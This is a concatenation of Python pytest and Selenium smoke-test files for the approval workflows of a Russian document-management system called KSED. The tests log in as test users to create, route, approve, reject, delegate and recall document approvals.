# #.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
# #.... python -m pytest -v test_CardSoglas.py::test_15772 --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
# #.... python -m pytest -v test_CardSoglas.py --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
# #.... python -m pytest -v --driver FireFox --driver-path WebDriver\geckodriver --alluredir ./allure_report
# #.... python -m pytest -v test_CardSoglas.py --driver FireFox --driver-path WebDriver\geckodriver --alluredir ./allure_report
# #.... python -m pytest -v test_CardSoglas.py::test_18338 --driver FireFox --driver-path WebDriver\geckodriver --alluredir ./allure_report
# #.... python -m pytest -v --driver IE --driver-path WebDriver\IEDriverServer --alluredir ./allure_report
#IEDriver
# #.... allure generate ./allure_report && allure open allure-report
# # -s команда вывода всех print в консоль
#
#
#
import pytest
import allure
from KSED.Tests.tk15720 import KSEDCreatDocCS_RD
from KSED.Tests.tk15722 import KSEDCreatDocCS_LND
from KSED.Tests.tk15723 import KSEDCreatDocCS_ETC
from KSED.Tests.tk15745 import KSEDCreatWaySogl
from KSED.Tests.tk15750 import KSEDCreatWaySogl_RD
from KSED.Tests.tk15744 import KSEDaddPerson
from KSED.Tests.tk15755 import KSEDNaprSogl_RD
from KSED.Tests.tk15758 import KSEDaddNewVersion
from KSED.Tests.tk15759 import KSEDaddNewAtt
from KSED.Tests.tk15765 import KSEDreject_RD
from KSED.Tests.tk15764 import KSEDacceptSogl_RD
from KSED.Tests.tk15767 import KSEDinnerSogl_RD
from KSED.Tests.tk15772 import KSEDrejectInnerSogl_RD
from KSED.Tests.tk15777 import KSEDrejectTaskInnerSogl_RD
from KSED.Tests.tk15779 import KSEDrepeatInnerSogl_RD
from KSED.Tests.tk15780 import KSEDAcceptInnerSogl_RD
from KSED.Tests.tk15781 import KSEDaddComment
from KSED.Tests.tk15806 import KSEDtakeTask
from KSED.Tests.tk15807 import KSEDbackTask
from KSED.Tests.tk15810 import KSEDreturnDecision_RD
from KSED.Tests.tk15812 import KSEDsoftDecision_RD
from KSED.Tests.tk18300 import KSEDchangeAfterRejectInnerSogl_RD
from KSED.Tests.tk18302 import KSEDsoftDesAfterRejectInnerSogl_RD
from KSED.Tests.tk18327 import KSEDchangeAfterAcceptInnerSogl_RD
from KSED.Tests.tk18329 import KSEDchangeAfterAcceptWithRemarkInnerSogl_RD
from KSED.Tests.tk18330 import KSEDsoftDisAfterAcceptWithRemarkInnerSogl_RD
from KSED.Tests.tk18332 import KSEDaddCommentInnerSogl_RD
from KSED.Tests.tk18334 import KSEDInnerSoglAfterAddComment_RD
from KSED.Tests.tk18336 import KSEDacceptSoglwithRemark_RD
from KSED.Tests.tk18337 import KSEDrejectAfterAcceptSoglwithRemark_RD
from KSED.Tests.tk18338 import KSEDsoftDisAfterAcceptSoglwithRemark_RD
from KSED.Tests.tk18360 import KSEDreturnDisFromDelegatAfterReject_RD
from KSED.Tests.tk18361 import KSEDreturnDisAfterTakeTask
from KSED.Tests.tk18362 import KSEDsoftDisFromDelegatAfterReject_RD
from KSED.Tests.tk18363 import KSEDsoftDisAfterTakeTask
@pytest.mark.KSED_smoke_test
def test_15720(web_browser):
    """Create an approval card (KS), document kind "RD" (administrative document)."""
    page = KSEDCreatDocCS_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')  # authenticate
    page.Creat()                            # create the card
    page.LinkDocWFile()                     # attach the document file
@pytest.mark.KSED_smoke_test
def test_15722(web_browser):
    """Create an approval card (KS), document kind "LND" (local normative document)."""
    page = KSEDCreatDocCS_LND(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')  # authenticate
    page.Creat()                            # create the card
@pytest.mark.KSED_smoke_test
def test_15723(web_browser):
    """Create an approval card (KS), document kind "Other"."""
    page = KSEDCreatDocCS_ETC(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')  # authenticate
    page.Creat()                            # create the card
    page.LinkDocWFile()                     # attach the document file
@pytest.mark.KSED_smoke_test
def test_15744(web_browser):
    """Add an employee to an approval-route stage."""
    page = KSEDaddPerson(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')   # authenticate
    page.Creat()                             # create the card
    page.creation_of_the_approval_route()    # build the route (adds the person)
@pytest.mark.KSED_smoke_test
def test_15745(web_browser):
    """Create a non-typical (custom) approval route."""
    page = KSEDCreatWaySogl(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')   # authenticate
    page.Creat()                             # create the card
    page.creation_of_the_approval_route()    # build the custom route
@pytest.mark.KSED_smoke_test
def test_15750(web_browser):
    """Create a typical (template) approval route."""
    # Step 1: create the document with an attached file
    page = KSEDCreatWaySogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    page.USER_LOGOUTs()  # log out
    # Step 2: log back in, reopen the document, and create the route
    page = KSEDCreatWaySogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.getDoc()
    page.creation_of_the_approval_route()
@pytest.mark.KSED_smoke_test
def test_15755(web_browser):
    """Send a document for approval."""
    # Step 1: create the document
    page = KSEDNaprSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
@pytest.mark.KSED_smoke_test
def test_15758(web_browser):
    """Add a new version of the attached file after recalling the document."""
    # Step 1: create the document
    page = KSEDaddNewVersion(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    # Step 4: recall the document from approval
    page.rejectYourself()
    # Step 5: upload a new version of the file
    page.attachment_docReady()
@pytest.mark.KSED_smoke_test
def test_15759(web_browser):
    """Add a new attachment file after recalling the document.

    Same flow as test_15758, but a brand-new file is attached
    (``attachment_NewDoc``) instead of a new version of the same file.
    """
    # Step 1: create the document
    page = KSEDaddNewAtt(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    # Step 4: recall the document from approval
    page.rejectYourself()
    # Step 5: upload a new file
    page.attachment_NewDoc()
@pytest.mark.KSED_smoke_test
def test_15764(web_browser):
    """Main approval: the approver accepts the document."""
    # Step 1: create the document (author)
    page = KSEDacceptSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    page.USER_LOGOUTs()  # log out
    # Step 2: log back in, reopen the document, create the route
    page = KSEDacceptSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.getDoc()
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: the approver accepts the document
    page2 = KSEDacceptSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.acceptDoc()
@pytest.mark.KSED_smoke_test
def test_15765(web_browser):
    """Main approval: the approver rejects the document."""
    # Step 1: create the document (author)
    page = KSEDreject_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: the approver rejects the document
    page2 = KSEDreject_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.rejectDoc()
@pytest.mark.KSED_smoke_test
def test_15767(web_browser):
    """Internal approval: the main approver sends the document to an internal approver."""
    # Step 1: create the document (author)
    page = KSEDinnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: send to internal approval (main approver)
    page2 = KSEDinnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
@pytest.mark.KSED_smoke_test
def test_15772(web_browser):
    """Recall the document from internal approval."""
    # Step 1: create the document (author)
    page = KSEDrejectInnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: send to internal approval (main approver)
    page2 = KSEDrejectInnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    # Step 5: recall the internal approval
    page2.rejectInnerSogl()
@pytest.mark.KSED_smoke_test
def test_15777(web_browser):
    """Recall an internal-approval task."""
    # Step 1: create the document (author)
    page = KSEDrejectTaskInnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: send to internal approval, then recall the task
    page2 = KSEDrejectTaskInnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    page2.rejectTaskInnerSogl()
@pytest.mark.KSED_smoke_test
def test_15779(web_browser):
    """Resend to internal approval after recalling the task."""
    # Step 1: create the document (author)
    page = KSEDrepeatInnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: send to internal approval, recall the task, then resend
    page2 = KSEDrepeatInnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    page2.rejectTaskInnerSogl()
    page2.repeatInnerSogl()
@pytest.mark.KSED_smoke_test
def test_15780(web_browser):
    """Internal approval: the internal approver issues a decision (accepts)."""
    # Step 1: create the document (author)
    page = KSEDAcceptInnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: send to internal approval (main approver)
    page2 = KSEDAcceptInnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    page2.USER_LOGOUTs()  # log out
    # Step 5: the internal approver accepts
    page3 = KSEDAcceptInnerSogl_RD(web_browser)
    page3.LogIN('tst_user11', 'Changeme!')
    page3.getDoc()
    page3.AcceptInnerSogl()
@pytest.mark.KSED_smoke_test
def test_15781(web_browser):
    """Main approval: the approver adds remarks (comments)."""
    # Step 1: create the document (author)
    page = KSEDaddComment(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: the approver adds a comment
    page2 = KSEDaddComment(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.addComment()
@pytest.mark.KSED_smoke_test
def test_15806(web_browser):
    """Take over an approval task (delegate picks it up)."""
    # Step 1: create the document (author)
    page = KSEDtakeTask(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    page.USER_LOGOUTs()  # log out
    # Step 2: log back in, reopen the document, create the route
    page = KSEDtakeTask(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.getDoc()
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: the delegate takes the task
    page2 = KSEDtakeTask(web_browser)
    page2.LogIN('tst_user1', 'Changeme!')
    page2.getDoc()
    page2.takeTask_RD()
@pytest.mark.KSED_smoke_test
def test_15807(web_browser):
    """Return an approval task after taking it over."""
    # Step 1: create the document (author)
    page = KSEDbackTask(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    page.USER_LOGOUTs()  # log out
    # Step 2: log back in, reopen the document, create the route
    page = KSEDbackTask(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.getDoc()
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: the delegate takes the task
    page2 = KSEDbackTask(web_browser)
    page2.LogIN('tst_user1', 'Changeme!')
    page2.getDoc()
    page2.takeTask_RD()
    # Step 5: return the task
    page2.backTask_RD()
@pytest.mark.KSED_smoke_test
def test_15810(web_browser):
    """Recall a decision after rejecting the document."""
    # Step 1: create the document (author)
    page = KSEDreturnDecision_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    page.USER_LOGOUTs()  # log out
    # Step 2: log back in, reopen the document, create the route
    page = KSEDreturnDecision_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.getDoc()
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: the approver rejects the document
    page2 = KSEDreturnDecision_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.rejectDoc()
    # Step 5: recall the decision
    page2.returnDecision_RD()
@pytest.mark.KSED_smoke_test
def test_15812(web_browser):
    """Soften a decision after rejecting the document."""
    # Step 1: create the document (author)
    page = KSEDsoftDecision_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    page.USER_LOGOUTs()  # log out
    # Step 2: log back in, reopen the document, create the route
    page = KSEDsoftDecision_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.getDoc()
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: the approver rejects the document
    page2 = KSEDsoftDecision_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.rejectDoc()
    # Step 5: soften the decision
    page2.softDecision_RD()
@pytest.mark.KSED_smoke_test
def test_18300(web_browser):
    """Internal approval: recall the decision after a rejection."""
    # Step 1: create the document (author)
    page = KSEDchangeAfterRejectInnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: send to internal approval (main approver)
    page2 = KSEDchangeAfterRejectInnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    page2.USER_LOGOUTs()  # log out
    # Step 5: the internal approver rejects, then recalls the decision
    page3 = KSEDchangeAfterRejectInnerSogl_RD(web_browser)
    page3.LogIN('tst_user11', 'Changeme!')
    page3.getDoc()
    page3.RejectInnerSogl()
    page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
def test_18302(web_browser):
    """Internal approval: soften the decision after a rejection."""
    # Step 1: create the document (author)
    page = KSEDsoftDesAfterRejectInnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: send to internal approval (main approver)
    page2 = KSEDsoftDesAfterRejectInnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    page2.USER_LOGOUTs()  # log out
    # Step 5: the internal approver rejects, then softens the decision
    page3 = KSEDsoftDesAfterRejectInnerSogl_RD(web_browser)
    page3.LogIN('tst_user11', 'Changeme!')
    page3.getDoc()
    page3.RejectInnerSogl()
    page3.softDecision_RD()
@pytest.mark.KSED_smoke_test
def test_18327(web_browser):
    """Internal approval: recall the decision after an acceptance."""
    # Step 1: create the document (author)
    page = KSEDchangeAfterAcceptInnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: send to internal approval (main approver)
    page2 = KSEDchangeAfterAcceptInnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    page2.USER_LOGOUTs()  # log out
    # Step 5: the internal approver accepts, then recalls the decision
    page3 = KSEDchangeAfterAcceptInnerSogl_RD(web_browser)
    page3.LogIN('tst_user11', 'Changeme!')
    page3.getDoc()
    page3.AcceptInnerSogl()
    page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
def test_18329(web_browser):
    """Internal approval: recall the decision after acceptance with remarks."""
    # Step 1: create the document (author)
    page = KSEDchangeAfterAcceptWithRemarkInnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: send to internal approval (main approver)
    page2 = KSEDchangeAfterAcceptWithRemarkInnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    page2.USER_LOGOUTs()  # log out
    # Step 5: the internal approver accepts, then recalls the decision
    page3 = KSEDchangeAfterAcceptWithRemarkInnerSogl_RD(web_browser)
    page3.LogIN('tst_user11', 'Changeme!')
    page3.getDoc()
    page3.AcceptInnerSogl()
    page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
def test_18330(web_browser):
    """Internal approval: soften the decision after acceptance with remarks."""
    # Step 1: create the document (author)
    page = KSEDsoftDisAfterAcceptWithRemarkInnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: send to internal approval (main approver)
    page2 = KSEDsoftDisAfterAcceptWithRemarkInnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    page2.USER_LOGOUTs()  # log out
    # Step 5: the internal approver accepts, then softens the decision
    page3 = KSEDsoftDisAfterAcceptWithRemarkInnerSogl_RD(web_browser)
    page3.LogIN('tst_user11', 'Changeme!')
    page3.getDoc()
    page3.AcceptInnerSogl()
    page3.softDecision_RD()
@pytest.mark.KSED_smoke_test
def test_18332(web_browser):
    """Internal approval: add comments as the internal approver."""
    # Step 1: create the document (author)
    page = KSEDaddCommentInnerSogl_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: send to internal approval (main approver)
    page2 = KSEDaddCommentInnerSogl_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    page2.USER_LOGOUTs()  # log out
    # Step 5: the internal approver adds a comment.
    # BUGFIX: the original created page3 but kept calling page2; page3 is
    # used consistently here (same class/browser, so behavior is unchanged).
    page3 = KSEDaddCommentInnerSogl_RD(web_browser)
    page3.LogIN('tst_user11', 'Changeme!')
    page3.getDoc()
    page3.addComment()
@pytest.mark.KSED_smoke_test
def test_18334(web_browser):
    """Internal approval after deleting a previously added comment."""
    # Step 1: create the document (author)
    page = KSEDInnerSoglAfterAddComment_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: send to internal approval (main approver)
    page2 = KSEDInnerSoglAfterAddComment_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.innerSogl()
    page2.USER_LOGOUTs()  # log out
    # Step 5: the internal approver comments, accepts with the comment,
    # then accepts again after the comment is removed.
    # BUGFIX: the original created page3 but kept calling page2; page3 is
    # used consistently here (same class/browser, so behavior is unchanged).
    page3 = KSEDInnerSoglAfterAddComment_RD(web_browser)
    page3.LogIN('tst_user11', 'Changeme!')
    page3.getDoc()
    page3.addComment()
    page3.AcceptInnerSoglWithComment()
    page3.AcceptInnerSogl()
@pytest.mark.KSED_smoke_test
def test_18336(web_browser):
    """Main approval with remarks: the approver accepts the document."""
    # Step 1: create the document (author)
    page = KSEDacceptSoglwithRemark_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: the approver accepts the document
    page2 = KSEDacceptSoglwithRemark_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.acceptDoc()
@pytest.mark.KSED_smoke_test
def test_18337(web_browser):
    """Main approval with remarks, then recall the decision."""
    # Step 1: create the document (author)
    page = KSEDrejectAfterAcceptSoglwithRemark_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: the approver accepts, then recalls the decision
    page2 = KSEDrejectAfterAcceptSoglwithRemark_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.acceptDoc()
    page2.returnDecision_RD()
@pytest.mark.KSED_smoke_test
def test_18338(web_browser):
    """Main approval with remarks, then soften the decision."""
    # Step 1: create the document (author)
    page = KSEDsoftDisAfterAcceptSoglwithRemark_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: the approver accepts, then softens the decision
    page2 = KSEDsoftDisAfterAcceptSoglwithRemark_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.acceptDoc()
    page2.softDecision_RD()
@pytest.mark.KSED_smoke_test
def test_18360(web_browser):
    """Delegate recalls the decision after the main approver rejected."""
    # Step 1: create the document (author)
    page = KSEDreturnDisFromDelegatAfterReject_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: create the approval route
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: the main approver rejects the document
    page2 = KSEDreturnDisFromDelegatAfterReject_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.rejectDoc()
    # BUGFIX: log out the active session via page2 (the original reused
    # `page`, whose session was already logged out above).
    page2.USER_LOGOUTs()
    # Step 5: the delegate recalls the decision.
    # BUGFIX: use page3 for getDoc (the original mixed in page2).
    page3 = KSEDreturnDisFromDelegatAfterReject_RD(web_browser)
    page3.LogIN('tst_user1', 'Changeme!')
    page3.getDoc()
    page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
def test_18361(web_browser):
    """Recall the decision after the delegate's rejection."""
    # Step 1: create the document (author)
    page = KSEDreturnDisAfterTakeTask(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    page.USER_LOGOUTs()  # log out
    # Step 2: log back in, reopen the document, create the route
    page = KSEDreturnDisAfterTakeTask(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.getDoc()
    page.creation_of_the_approval_route()
    # Step 3: attach the file and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: the delegate takes the task and rejects the document
    page2 = KSEDreturnDisAfterTakeTask(web_browser)
    page2.LogIN('tst_user1', 'Changeme!')
    page2.getDoc()
    page2.takeTask_RD()
    page2.rejectDoc()
    # BUGFIX: log out the active session via page2 (the original reused
    # `page`, whose session was already logged out above).
    page2.USER_LOGOUTs()
    # Step 5: the main approver recalls the decision.
    # BUGFIX: use page3 for getDoc (the original mixed in page2).
    page3 = KSEDreturnDisAfterTakeTask(web_browser)
    page3.LogIN('YatskinRS', 'Changeme!')
    page3.getDoc()
    page3.returnDecision_RD()
@pytest.mark.KSED_smoke_test
def test_18362(web_browser):
    """Softening of the delegate's decision after the main approver rejects approval.

    Flow: create a document, build the approval route and send for approval;
    the main approver rejects; the delegate then softens the decision.
    """
    # Step 1: create the document
    page = KSEDsoftDisFromDelegatAfterReject_RD(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    # Step 2: build the approval route
    page.creation_of_the_approval_route()
    # Step 3: add an attachment and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: reject the approval as the main approver
    page2 = KSEDsoftDisFromDelegatAfterReject_RD(web_browser)
    page2.LogIN('YatskinRS', 'Changeme!')
    page2.getDoc()
    page2.rejectDoc()
    # BUG FIX: was page.USER_LOGOUTs() — log out through the page object whose session is active
    page2.USER_LOGOUTs()
    # Step 5: soften the decision as the delegate
    page3 = KSEDsoftDisFromDelegatAfterReject_RD(web_browser)
    page3.LogIN('tst_user1', 'Changeme!')
    # BUG FIX: was page2.getDoc() — open the document with the page object that just logged in
    page3.getDoc()
    page3.softDecision_RD()
@pytest.mark.KSED_smoke_test
def test_18363(web_browser):
    """Softening of a decision after the delegate has taken and rejected the task.

    Flow: create a document, build the approval route and send for approval;
    the delegate takes the task and rejects it; the main approver then softens
    the decision.
    """
    # Step 1: create the document
    page = KSEDsoftDisAfterTakeTask(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.Creat()
    page.LinkDocWFile()
    page.USER_LOGOUTs()  # log out
    # Step 2: re-open the document and build the approval route
    page = KSEDsoftDisAfterTakeTask(web_browser)
    page.LogIN('StroganovSN', 'Changeme!')
    page.getDoc()
    page.creation_of_the_approval_route()
    # Step 3: add an attachment and send for approval
    page.attachment()
    page.NapSoglasovanie()
    page.USER_LOGOUTs()  # log out
    # Step 4: take the task as the delegate and reject it
    page2 = KSEDsoftDisAfterTakeTask(web_browser)
    page2.LogIN('tst_user1', 'Changeme!')
    page2.getDoc()
    page2.takeTask_RD()
    page2.rejectDoc()
    # BUG FIX: was page.USER_LOGOUTs() — log out through the page object whose session is active
    page2.USER_LOGOUTs()
    # Step 5: soften the decision as the main approver
    page3 = KSEDsoftDisAfterTakeTask(web_browser)
    page3.LogIN('YatskinRS', 'Changeme!')
    # BUG FIX: was page2.getDoc() — open the document with the page object that just logged in
    page3.getDoc()
    page3.softDecision_RD()
--- FILE SEPARATOR ---
#!/bin/sh
#!/usr/bin/python3
# -*- encoding=utf8 -*-
# How to run:
#.... python -m pytest -v --driver Chrome --driver-path WebDriver\chromedriver --alluredir ./allure_report
#.... allure generate ./allure_report && allure open allure-report
# -s команда вывода всех print в консоль
import pytest
import allure
from KSED.Tests.tk11690 import KSEDsubordinate_doc
from KSED.Tests.tk11689 import KSEDViewTheDocumentCard
@allure.feature('Просмотр связанных документов в области просмотра разделов (Навигатор)')
@pytest.mark.KSED_smoke_test
def test_11690(web_browser):
    """View related documents in the section-view area (Navigator)."""
    navigator = KSEDsubordinate_doc(web_browser)
    navigator.LogIN('StroganovSN', 'Changeme!')  # sign in
    navigator.subordinate_doc()                  # open the related-documents view
@allure.feature('Переход в карточку документа из области просмотра разделов (Навигатор)')
@pytest.mark.KSED_smoke_test
def test_11689(web_browser):
    """Open a document card from the section-view area (Navigator)."""
    card_page = KSEDViewTheDocumentCard(web_browser)
    card_page.LogIN('StroganovSN', 'Changeme!')  # sign in
    card_page.ViewTheDocumentCard()              # navigate into the document card
--- FILE SEPARATOR ---
#!/bin/sh
